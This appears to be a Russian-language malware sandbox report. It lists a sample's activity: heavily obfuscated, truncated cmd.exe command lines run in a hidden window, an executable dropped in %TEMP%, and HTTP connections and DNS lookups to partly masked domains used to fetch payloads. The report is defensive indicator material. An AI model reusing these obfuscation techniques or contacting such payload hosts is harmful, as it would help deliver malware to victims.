Техническая информация
- '<SYSTEM32>\cmd.exe' /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT...
- %TEMP%\535.exe
- %TEMP%\535.exe
- 'ha###nscs.com':80
- 'hy#####rbonreports.com':80
- 'hy#####rbonreports.com':443
- 'aj##.com':80
- 'ex#####freeresults.com':80
- http://hy#####rbonreports.com/0
- http://aj##.com/akDJlHl
- http://www.ex#####freeresults.com/?dn###############################
- 'hy#####rbonreports.com':443
- DNS ASK ha###nscs.com
- DNS ASK hy#####rbonreports.com
- DNS ASK gr####isionpr.com
- DNS ASK aj##.com
- DNS ASK ex#####freeresults.com
- DNS ASK ka###.zendo.in.ua
- '<SYSTEM32>\cmd.exe' /c f^OR ; /^f , " delims=fo2XA tokens= 1 " , ; %^W , iN , ( , ; ' ; ; ^^FT^^yPe ; ^| ; FIN^^d^^S^^Tr , d^^f^^i ' ; ) ; do ; %^W; , yr2eOFUzM/^Vj^]N^j~a0p ; Jq9nYIeM/R " , ( (^SeT...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ^FT^yPe | FIN^d^S^Tr d^f^i
- '<SYSTEM32>\cmd.exe' /S /D /c" FTyPe "
- '<SYSTEM32>\findstr.exe' dfi
- '<SYSTEM32>\cmd.exe' ; , yr2eOFUzM/Vj]Nj~a0p ; Jq9nYIeM/R " , ( (^SeT _^ =:Xw\=C pd^G^,i^3^(t5^c4DH^)h0^kg^an7}^z^.oFjs^yW'rN-ZS$^;^+b^@xM^e^JB{v^u^mlf^P/) )&& ; , fO^R , ; %^G ; ; ^IN , ( ^7^ +31 ^2^...